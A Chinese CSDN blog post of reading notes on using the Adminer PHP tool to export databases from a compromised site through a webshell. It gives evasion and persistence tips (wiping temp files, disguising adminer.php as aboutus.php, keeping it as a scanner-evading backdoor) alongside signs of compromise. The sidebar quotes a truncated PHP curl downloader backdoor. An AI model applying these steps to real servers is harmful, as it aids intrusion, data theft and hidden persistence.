2021-04-25-读书笔记1-3-数据库在线导出工具Adminer

最新推荐文章于 2024-03-11 17:21:36 发布
最新推荐文章于 2024-03-11 17:21:36 发布
阅读量252 收藏
点赞数
分类专栏: SQLMAP学习 文章标签: 安全 网络安全 数据安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39934009/article/details/116113510
版权

读书笔记1-3                             数据库在线导出工具Adminer

渗透实战当获取到网站webshell时,由于网站所设字符不同,虽然可以通过phpspy等工具导出数据库到网站目录中,但数据库下载到本地还会有乱码,因此推荐Adminer工具

准备工作

1 下载程序   2 上传文件到服务器,可通过webshell等将adminer.php文件上传到网站目录,再通过URL地址访问  3 收集并整理数据库连接账号,密码,数据库名。

安全防范及总结

1 使用adminer会在linux的/tmp目录下生成一个token或其他临时文件,如检查时发现,说明服务器可能被入侵,数据库可能被导出过

2 对日志文件记录查看,是否包含adminer.php ,如有可能被入侵过

3 使用adminer.php导出数据库后,需将临时文件进行清理删除

4 重命名adminer.php为一个伪装性的名称,如aboutus.php

5 adminer.php还可作为后门保护文件,一般webshell可能被查杀,adminer仅是一个数据库管理工具,因此可逃过查杀

6 发现adminer.php后,应及时对网站后门进行清理,分析和修补漏洞,并且解释更改数据库密码

weixin_39934009
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
laravel-adminer:Laravel应用程序的管理员数据库管理工具
02-04
应用程序的数据库管理工具。 目录 介绍 什么是管理员? Adminer(以前称为phpMinAdmin)是用PHP编写的功能齐全的数据库管理工具。 有关更多信息,。 管理员可用于MySQL,MariaDB,PostgreSQL,SQLite,MS SQL,...
laravel-adminer:Laravel 5+的管理员数据库管理器
02-04
集成到Laravel 5/6/7/8中的轻量级数据库管理工具。 各种数据库支持:MySQL,SQLite,PostgreSQL,Oracle,MS SQL,Firebird,SimpleDB,MongoDB,Elasticsearch等。 v5.0新功能: 启用自动登录数据库(默认值: ...
Adminer: 简单而强大的数据库管理工具
最新发布
gitblog_00009的博客
03-11 815
Adminer: 简单而强大的数据库管理工具 Adminer 是一个开源的、轻量级的数据库管理工具,能够帮助您更轻松地管理您的数据库。它可以用于多种数据库引擎,包括 MySQL、PostgreSQL、SQLite 和 MS SQL。 功能与用途 Adminer 提供了以下功能: 数据库管理:创建、删除、修改数据库表; 表数据操作:添加、删除、修改表中的记录; SQL 查询:执行自定义的 SQL ...
随记(五):一个简单又较隐蔽的PHP后门
XXR_Beta的博客
12-05 574
话不多说,直接上代码(backdoor.php) <?php function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_seto
渗透测试-地基篇-Webshell-帝国cms框架(九)
qq_34801745的博客
11-25 1236
** 渗透测试-地基篇-Webshell-帝国cms框架(九) ** 作者:大余 时间:2020-11-25 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言: 你对这行的兴趣,决定你
Adminer便捷管理MySQL数据库
weixin_34405332的博客
02-19 1646
为什么80%的码农都做不了架构师?>>> ...
adminer-clean-skin:为管理员清理主题
02-18
1. **Adminer**:了解 Adminer 的基本功能,包括数据库连接、查询执行、数据导入导出等,以及如何安装和配置。 2. **CSS 样式表**:学习 CSS 的基本语法,如选择器、属性和值,以及如何使用它们来更改网页元素的样式...
adminer-docker-dracula:具有dracula主题的Docker管理员映像
04-05
管理员-码头-德古拉 带有和,等待 ... CREATE TABLE "table_04" ( "id" integer NOT NULL ); CREATE TABLE "table_05" ( "id" integer NOT NULL ); CREATE TABLE "table_06" ( "id" integer NOT NU
adminer-shortcuts:一个插件,用于按名称过滤Adminer 4
05-01
当前版本:1.5.0(04/04/2021) 兼容性:管理员4.3 / 4.4 / 4.5 / 4.6 / 4.7 / 4.8-PHP 5.6 / 7.0 / 7.1 / 7.2 / 7.3 / 7.4 / 8.0 客户端兼容性:Firefox 36 +,Chrome 32 +,Opera 19 +,Edge 16 +,Safari 9+ ...
adminer
04-06
Adminer是一个类似于phpMyAdmin的MySQL管理客户端。整个程序只有一个PHP文件,易于使用和安装。Adminer支持多语言(已自 带11种翻译语言文件,可以按自己的需求翻译相应的语言)。支持PHP4.3+,MySQL 4.1+以上的版本。定制版更新:本作品为分享工作室定制作品, 官方在2013-05-19发布3.7.0新版本adminer, 却没能更好地解决兼容问题, 在php 5.3,5.4,5.5上均有异常, 同时也有许多html代码兼容bug, 为此, 我们选择了为其做一次定制版, 同时本工具也将集成在工作室其它作品之中. 感谢原团队的好作品.1: 兼容PHP 5.3+以上, 修复许多异常.2: html代码标准化修改.3: 增加Query log 功能, 可列表当前执行的所有语句.4: 功能及样式细节修复.
adminer.php数据库管理工具(无后门中文纯净版)
01-30
这是一款轻巧便捷的MySQL数据库管理工具整个程序只有一个文件,本源码已经测试无后门,网上有些都是有后门的
Mysql导入导出大型数据库方法
liuliuhelingdao的博客
09-08 2032
或者mysql -u root -p123456 mysql_test --default-character-set=utf8【快速登录,链接mysql_test数据库,并且设置编码为UTF-8编码】【注意:default之前有两个 - 】如果遇到大型数据库备份的时候,查看数据库中是否有缓存大数据的表,在导出的时候将这个表的数据过滤备份,只保留该表的结构就好,如果导出表超时使得文件不正确,那么就使用命令备份。然后输入source 数据库文件的绝对路径【直接将文件拖入到cmd中也可以】
记一次渗透之旅 ,网络安全学习至上
Karka_的博客
12-29 845
所谓“杀猪盘”,是指诈骗分子利用网络交友通常是“异性”交友,诱导受害人下载诈骗APP并在上面进行各种“投资”,如菠菜、股票、期货甚至虚拟货币的网络诈骗。今年某月某日小白就遭遇了这种骗局,他先是被骗子通过QQ添加并下载了一个名为”心动“的APP,在“心动“APP上结识了位名为“xx老师”的美女,小白被美色迷了眼打算相约这名网友,但是美女则借口让他下载另一个名为午夜乐园的APP进行投资,果不其然小白被成功骗取10余万。
记一次webshell的获取
2301_80127209的博客
01-22 50
遂尝试对http://t.test.xxx.com.cn 进行目录爆破,扫到如下php文件(其他目录没扫到什么文件就不列了)环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。开局就是一个登陆页面在登陆页面测试无果,随手输入http://t.test.xxx.com.cn。然后访问https://t.test.xxx.com.cn/abc/config.php。遂放弃通过mysql获取。想起http://t.xxx.com.cn 是一个php的网站。
web界面DB管理工具 Adminer |轻松管理多种数据库
linjingyg的博客
01-12 3084
  Admirer 是一个免费的开源数据库管理系统,打包在单个 PHP 文件中。它 支持 MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、SimpleDB、Elasticsearch、MongoDB、Firebird 等 。本文将讨论如何安装和使用 Adminer 来管理 MySQL、MariaDB 和 PostgreSQL 数据库服务器。   您可以将 phpMyAdmin 替换为 AdminerAdminer提供简单直观的用户界面。使用Admirer 的唯
Django Admin 后台增加 导出数据到 CSV
从零开始学习python --zeropython
10-30 585
在Django Admin中每个模型的Admin类(继承至admin.ModelAdmin), 我们可以通过actions增加支持的动作, 值为当前类存在的方法名, 例如: Python @admin.register(Issue) class IssueAdmin(admin.M...
phpmyadmin安装使用复杂,可以试试php版的Adminer
03-27 3038
Adminer只有一个文件. 上传到服务器即可使用.更强大的功能等待发掘
推荐轻量级MySQL数据库管理工具 Adminer
Just Code
08-13 1523
服务器上一直用 phpMyAdmin 管理 MySQL 数据库, 有点囊肿, 配置也麻烦, 所以换了个轻量级的 Adminer 数据库管理替换. Adminer 就一个单文件, 知道什么就轻量级了吧, 但是功能却不比 phpmyadmin 弱多少, 看 Adminer 与 phpMyAdmin 的对比, 嘿嘿. 同样 Adminer 拥有超过 10 种语言版本, 15个主题样式的.. 挺丰富多...
CVE-2022-31625
09-02
CVE-2022-31625是PHP中的一个远程代码执行漏洞。这个漏洞是由于PHP_FUNCTION中分配在堆上的数组清除不及时导致的。攻击者可以通过错误地再次调用php_pgsql_free_params()函数,并使用之前未及时清除的数组值,从而实现远程代码执行。这个漏洞可能影响基于PHP的数据库管理软件,例如Adminer和PHPmyAdmin。为了防止此漏洞的利用,建议及时升级到修复了该漏洞的PHP版本。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2022-33891POCApache Spark 命令注入(CVE-2022-33891)POC](https://download.csdn.net/download/qq_51577576/86396832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [烽火狼烟丨PHP远程代码执行漏洞(CVE-2022-31625、CVE-2022-31626)风险提示](https://blog.csdn.net/C20220511/article/details/125258528)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [【安全要闻】PHP多个远程代码执行漏洞风险预警](https://blog.csdn.net/qzt961003/article/details/125317187)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值